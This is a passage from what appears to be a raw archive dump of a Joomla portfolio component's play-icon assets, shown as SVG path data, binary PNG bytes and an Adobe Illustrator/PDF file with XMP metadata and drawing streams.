	s28.224,12.701,28.224,28.224S270.523,283.224,255,283.224z"/>
<g display="none">
	<path display="inline" fill="#FFFFFF" d="M248.6,269.4l19.2-14.4l-19.2-14.4V269.4z M255,223c-17.6,0-32,14.4-32,32s14.4,32,32,32
		s32-14.4,32-32S272.6,223,255,223z M255,281.88c-14.784,0-26.88-12.096-26.88-26.88s12.096-26.88,26.88-26.88
		s26.88,12.096,26.88,26.88S269.784,281.88,255,281.88z"/>
</g>
<g opacity="0.9">
	<path fill="#FFFFFF" d="M247.776,267.85L269.454,255l-21.678-12.85V267.85z"/>
</g>
<g opacity="0.5">
	<g>
		<path fill="#FFFFFF" d="M255,223c-17.6,0-32,14.4-32,32s14.4,32,32,32s32-14.4,32-32S272.6,223,255,223z M255,283.224
			c-15.523,0-28.224-12.701-28.224-28.224s12.701-28.224,28.224-28.224s28.224,12.701,28.224,28.224S270.523,283.224,255,283.224z"
			/>
	</g>
</g>
</svg>
PK!�WI�i
i
8flex/html/com_spsimpleportfolio/assets/img/icon-play.pngnu&1i��PNG


IHDR``�w8tEXtSoftwareAdobe ImageReadyq�e<
IDATx��][LYn�rY�fYV��h@����4>H0M�
���%!}1&^BL4Ɨ��˃���E�Q�.1�`1�!����E��Ɗ�a�3�ez�t
�̙�IC�L�9�7���9��Z8�����^v�M��P��Q�wDx�W�j�xl��3�s؎8��(!e�B����nW�烄�Z�a��d�O��*�t92^
�~��iC o'��dN]��AC@�xȌs)�����@�k�H�=���i��ϟ����V�^�q���'�4�[�Eࣺ㇇�W>����ۛ��ի$�mrr���А"Psss����-+..�]�v�Laa��>����~=�/��BW��"a�"{��YVGGG�ӧOS|>ߧ�����yYYYɥ��)�6m�T^^>�q�Ʊ(>'�gm��N�rY�z�Y7o�L~����>���+V�X�y�洚��銊��(�
���%D�˔��}}}׮]���ۊe%^�ڽ{����n�:%w8B��X�k%�"�֋�߸q#��ڷo_�B"p��XH�5���g� -IW�^��ҥKV��x%=�ȑ#s�]�����/hF�rJ������g����eёUVV~{���q�q��p�o)Q�u	��ϗ��/_����x�x��hd��v�>|x(BoH�R��H�#�?q��---[`{����ٳ�#�#E�5ֲ��Օ]__o���	Zd6l�766].�H,��%������'��%��h�⠅@b����X9f�"F�T�r�J��={f�
>mC�V��\��@Yr�;v�Z#Y-
mD[#�PA0��	_V��BvpW$��tƭ[�l2r4*H�w�=��v,��O4�Ş���)���{Ѳ*V��k�.�Ѣ��DGw���	Q��R�z��5�B����À�&�`��S�9F�Fd�€0a� X*'�xp'+���	�B&��q�Ɋ�X=�%Ӥ�5��v�i��0�H|.�2{�z�#������l��L/�+�E�O�a
�&�����p�,!���O��J3�����t�b.��i�N��x��V#.^�X����J�ӹR�$+F/��mJ����x�����ݻW{����5k֤��!��"*d��$0u��hHjjjJUUU�G�j�����D0v�C��l�Mz���h�bNOO_y�̙J���^d	�;�0?��ڙ�4�K������A�^dI;�H�;�1c����E��0��!��ݏ�����Ce���|���!�pN(Ԝ6&����!KBW�mmmu�(K2f����~�R�KԱcǎ�����B��K��� c~�ޒn[�nwO��%��G���zM��$�o�$����`e�E�e˖BȒ��)��:d���X˂,0����]}}}�Z%�d�̦�k�,����UH�i!K������E@X�h�n�,a4�fZB\�)��l�41�'��uZ?{��u��@F�j={`aJ%@�����!^���4!%(�,���3	�ؾ2!�����Ow����>�	@��*|a�4�v���~��x��T��H�с���x�ԩ����?�[b%S�4�����v� ͈�?~������IM�%0���TA�#?22��ܹs]jȍԀ%�"��Wep2���c�iii�	N�[Á�,��U.�4e�����z�捦�Ve���%���+��O�<�kGG�;�Gˀ���5�P�Bor��x:�N�/���%��Sa�V��ƚ^���~7�����^��2VP��a��8�0C�;=�MMMMsuu��Z%�#���@uA��u{���v��Fj�2�G�a:�Ҏ�.�[����|[�nmnll�w;Fy̠�{mRM�J;�$7۷o�2��Qn��n84!���jj����xf,c�~v��a�dCh���*�ԋ�H
�1����_�D�%��PKS�1r�;w�l֋�Hc`�8�c)(��[(d���j5��ѣ�۶mk׋�H
X1������IϘ���̀��bXv)hZ��K��J��^�������QQքXހ�L��0lm��1�B8����	3݀
0b��v�`MKyA���r�zKҩ�x�
���4+̧@J�S{j)���	�B&2u���r�̉Y�,U�PK�|M��
X��\5]�h�-�E���R�D-e�ΞPr�6y0�.�T+�*�L��`��.,�A��G�e��&�YbB��L6:ԟ($���2�y�n�c���R�5+_Oz��9���������-��h7��z��i�?�&�i����Mv�X�f>�&>�\n�B����V�X)u�bo07r�!)s+C� $��yjI@�v�Z"I���Z ���-͵" �7�W*Krr%�|A�i�����bA\�”�,����@6/@��h{��&��yI{��k$=����K�`c�H��x�	�8�$t�k�(���Vp�%	!#�2_D����H�
k	:�0�4+;:��B�Ɲ�p��+�4�?��g�IEND�B`�PK!%�m����7flex/html/com_spsimpleportfolio/assets/img/icon-play.ainu&1i�%PDF-1.5
%����
1 0 obj
<</Metadata 2 0 R/OCProperties<</D<</ON[5 0 R 31 0 R]/Order 32 0 R/RBGroups[]>>/OCGs[5 0 R 31 0 R]>>/Pages 3 0 R/Type/Catalog>>
endobj
2 0 obj
<</Length 14113/Subtype/XML/Type/Metadata>>stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151739, 2013/04/03-12:12:15        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/"
            xmlns:xmpTPg="http://ns.adobe.com/xap/1.0/t/pg/"
            xmlns:stDim="http://ns.adobe.com/xap/1.0/sType/Dimensions#"
            xmlns:xmpG="http://ns.adobe.com/xap/1.0/g/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:pdf="http://ns.adobe.com/pdf/1.3/">
         <xmp:CreatorTool>Adobe Illustrator CC (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-05-09T12:09:12+02:00</xmp:CreateDate>
         <xmp:MetadataDate>2015-05-09T12:13:40+02:00</xmp:MetadataDate>
         <xmp:ModifyDate>2015-05-09T12:13:40+02:00</xmp:ModifyDate>
         <xmp:Thumbnails>
            <rdf:Alt>
               <rdf:li rdf:parseType="Resource">
                  <xmpGImg:width>256</xmpGImg:width>
                  <xmpGImg:height>256</xmpGImg:height>
                  <xmpGImg:format>JPEG</xmpGImg:format>
                  <xmpGImg:image>/9j/4AAQSkZJRgABAgEASABIAAD/7QAsUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAASAAAAAEA&#xA;AQBIAAAAAQAB/+4ADkFkb2JlAGTAAAAAAf/bAIQABgQEBAUEBgUFBgkGBQYJCwgGBggLDAoKCwoK&#xA;DBAMDAwMDAwQDA4PEA8ODBMTFBQTExwbGxscHx8fHx8fHx8fHwEHBwcNDA0YEBAYGhURFRofHx8f&#xA;Hx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8f/8AAEQgBAAEAAwER&#xA;AAIRAQMRAf/EAaIAAAAHAQEBAQEAAAAAAAAAAAQFAwIGAQAHCAkKCwEAAgIDAQEBAQEAAAAAAAAA&#xA;AQACAwQFBgcICQoLEAACAQMDAgQCBgcDBAIGAnMBAgMRBAAFIRIxQVEGE2EicYEUMpGhBxWxQiPB&#xA;UtHhMxZi8CRygvElQzRTkqKyY3PCNUQnk6OzNhdUZHTD0uIIJoMJChgZhJRFRqS0VtNVKBry4/PE&#xA;1OT0ZXWFlaW1xdXl9WZ2hpamtsbW5vY3R1dnd4eXp7fH1+f3OEhYaHiImKi4yNjo+Ck5SVlpeYmZ&#xA;qbnJ2en5KjpKWmp6ipqqusra6voRAAICAQIDBQUEBQYECAMDbQEAAhEDBCESMUEFURNhIgZxgZEy&#xA;obHwFMHR4SNCFVJicvEzJDRDghaSUyWiY7LCB3PSNeJEgxdUkwgJChgZJjZFGidkdFU38qOzwygp&#xA;0+PzhJSktMTU5PRldYWVpbXF1eX1RlZmdoaWprbG1ub2R1dnd4eXp7fH1+f3OEhYaHiImKi4yNjo&#xA;+DlJWWl5iZmpucnZ6fkqOkpaanqKmqq6ytrq+v/aAAwDAQACEQMRAD8A9U4q7FXYq7FXYq7FXYq7&#xA;FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7F&#xA;XYq7FXYq7FXYq7FXYq7FVKa8tIP76eOKnXmyr+s4qg38yeXUYq+q2asOqtcRA/i2KuTzJ5ddgqar&#xA;Zsx6KtxET+DYqjIby0n/ALmeOWvTgyt+o4qq4q7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FXYq7FX&#xA;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&#xA;XYq7FXYq7FXYq7FXYq7FXYq7FXYq7FX/2Q==</xmpGImg:image>
               </rdf:li>
            </rdf:Alt>
         </xmp:Thumbnails>
         <xmpTPg:NPages>1</xmpTPg:NPages>
         <xmpTPg:HasVisibleTransparency>True</xmpTPg:HasVisibleTransparency>
         <xmpTPg:HasVisibleOverprint>False</xmpTPg:HasVisibleOverprint>
         <xmpTPg:MaxPageSize rdf:parseType="Resource">
            <stDim:w>64.000000</stDim:w>
            <stDim:h>64.000000</stDim:h>
            <stDim:unit>Pixels</stDim:unit>
         </xmpTPg:MaxPageSize>
         <xmpTPg:PlateNames>
            <rdf:Seq>
               <rdf:li>Cyan</rdf:li>
               <rdf:li>Magenta</rdf:li>
               <rdf:li>Yellow</rdf:li>
               <rdf:li>Black</rdf:li>
            </rdf:Seq>
         </xmpTPg:PlateNames>
         <xmpTPg:SwatchGroups>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <xmpG:groupName>Default Swatch Group</xmpG:groupName>
                  <xmpG:groupType>0</xmpG:groupType>
               </rdf:li>
            </rdf:Seq>
         </xmpTPg:SwatchGroups>
         <dc:format>application/pdf</dc:format>
         <dc:title>
            <rdf:Alt>
               <rdf:li xml:lang="x-default">icon-play</rdf:li>
            </rdf:Alt>
         </dc:title>
         <illustrator:Type>Document</illustrator:Type>
         <xmpMM:DocumentID>xmp.did:16d24bcc-7299-e04b-92ce-c94e7a497199</xmpMM:DocumentID>
         <xmpMM:InstanceID>uuid:3d0d5c6d-c2f4-4e7e-9813-3a2d598a09aa</xmpMM:InstanceID>
         <xmpMM:OriginalDocumentID>xmp.did:16d24bcc-7299-e04b-92ce-c94e7a497199</xmpMM:OriginalDocumentID>
         <xmpMM:RenditionClass>proof:pdf</xmpMM:RenditionClass>
         <xmpMM:DerivedFrom rdf:parseType="Resource"/>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:16d24bcc-7299-e04b-92ce-c94e7a497199</stEvt:instanceID>
                  <stEvt:when>2015-05-09T12:09:06+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Illustrator CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <pdf:Producer>Adobe PDF library 10.01</pdf:Producer>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                           
<?xpacket end="w"?>
endstream
endobj
3 0 obj
<</Count 1/Kids[7 0 R]/Type/Pages>>
endobj
7 0 obj
<</ArtBox[0.0 0.0 64.0 64.0]/BleedBox[0.0 0.0 64.0 64.0]/Contents 33 0 R/Group 34 0 R/LastModified(D:20150509121340+02'00')/MediaBox[0.0 0.0 64.0 64.0]/Parent 3 0 R/PieceInfo<</Illustrator 35 0 R>>/Resources<</ExtGState<</GS0 36 0 R/GS1 37 0 R/GS2 38 0 R>>/Properties<</MC0 31 0 R>>/XObject<</Fm0 39 0 R/Fm1 40 0 R/Fm2 41 0 R>>>>/Thumb 42 0 R/TrimBox[0.0 0.0 64.0 64.0]/Type/Page>>
endobj
33 0 obj
<</Filter/FlateDecode/Length 79>>stream
H��wV�u6PprqV�*�2P03!] .J�
W�
�(�s��(��sB��b�HbFP1#���/��@.����
endstream
endobj
34 0 obj
<</CS/DeviceRGB/I false/K false/S/Transparency>>
endobj
42 0 obj
<</BitsPerComponent 8/ColorSpace 43 0 R/Filter[/ASCII85Decode/FlateDecode]/Height 8/Length 59/Width 8>>stream
8;S%;0`_7S%"_ZcO+$@^S`'_Z1_#82,!^-FV75[TXVGF:lgOra!$f0*Hi~>
endstream
endobj
43 0 obj
[/Indexed/DeviceRGB 255 44 0 R]
endobj
44 0 obj
<</Filter[/ASCII85Decode/FlateDecode]/Length 428>>stream
8;X]O>EqN@%''O_@%e@?J;%+8(9e>X=MR6S?i^YgA3=].HDXF.R$lIL@"pJ+EP(%0
b]6ajmNZn*!='OQZeQ^Y*,=]?C.B+\Ulg9dhD*"iC[;*=3`oP1[!S^)?1)IZ4dup`
E1r!/,*0[*9.aFIR2&b-C#s<Xl5FH@[<=!#6V)uDBXnIr.F>oRZ7Dl%MLY\.?d>Mn
6%Q2oYfNRF$$+ON<+]RUJmC0I<jlL.oXisZ;SYU[/7#<&37rclQKqeJe#,UF7Rgb1
VNWFKf>nDZ4OTs0S!saG>GGKUlQ*Q?45:CI&4J'_2j<etJICj7e7nPMb=O6S7UOH<
PO7r\I.Hu&e0d&E<.')fERr/l+*W,)q^D*ai5<uuLX.7g/>$XKrcYp0n+Xl_nU*O(
l[$6Nn+Z_Nq0]s7hs]`XX1nZ8&94a\~>
endstream
endobj
39 0 obj
<</BBox[3.776 60.224 60.224 3.776]/Group 45 0 R/Length 205/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ExtGState<</GS0 46 0 R>>>>/Subtype/Form>>stream
0 0 0 rg
/GS0 gs
q 1 0 0 1 32 3.776 cm
0 0 m
-15.523 0 -28.224 12.701 -28.224 28.224 c
-28.224 43.747 -15.523 56.448 0 56.448 c
15.523 56.448 28.224 43.747 28.224 28.224 c
28.224 12.701 15.523 0 0 0 c
f
Q

endstream
endobj
40 0 obj
<</BBox[24.776 44.85 46.4538 19.15]/Group 47 0 R/Length 79/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ExtGState<</GS0 46 0 R>>>>/Subtype/Form>>stream
1 1 1 rg
/GS0 gs
q 1 0 0 1 24.776 19.15 cm
0 0 m
21.678 12.85 l
0 25.7 l
h
f
Q

endstream
endobj
41 0 obj
<</BBox[0.0 64.0 64.0 0.0]/Group 48 0 R/Length 355/Matrix[1.0 0.0 0.0 1.0 0.0 0.0]/Resources<</ExtGState<</GS0 46 0 R>>>>/Subtype/Form>>stream
1 1 1 rg
/GS0 gs
q 1 0 0 1 32 3.776 cm
0 0 m
-15.523 0 -28.224 12.701 -28.224 28.224 c
-28.224 43.747 -15.523 56.448 0 56.448 c
15.523 56.448 28.224 43.747 28.224 28.224 c
28.224 12.701 15.523 0 0 0 c
0 60.224 m
-17.6 60.224 -32 45.824 -32 28.224 c
-32 10.624 -17.6 -3.776 0 -3.776 c
17.6 -3.776 32 10.624 32 28.224 c
32 45.824 17.6 60.224 0 60.224 c
f
Q

endstream
endobj
48 0 obj
<</I false/K false/S/Transparency/Type/Group>>
endobj
46 0 obj
<</AIS false/BM/Normal/CA 1.0/OP false/OPM 1/SA true/SMask/None/Type/ExtGState/ca 1.0/op false>>
endobj
47 0 obj
<</I false/K false/S/Transparency/Type/Group>>
endobj
45 0 obj
<</I false/K false/S/Transparency/Type/Group>>
endobj
31 0 obj
<</Intent 49 0 R/Name(Capa 1)/Type/OCG/Usage 50 0 R>>
endobj
49 0 obj
[/View/Design]
endobj
50 0 obj
<</CreatorInfo<</Creator(Adobe Illustrator 17.0)/Subtype/Artwork>>>>
endobj
36 0 obj
<</AIS false/BM/Normal/CA 0.5/OP false/OPM 1/SA true/SMask/None/Type/ExtGState/ca 0.5/op false>>
endobj
37 0 obj
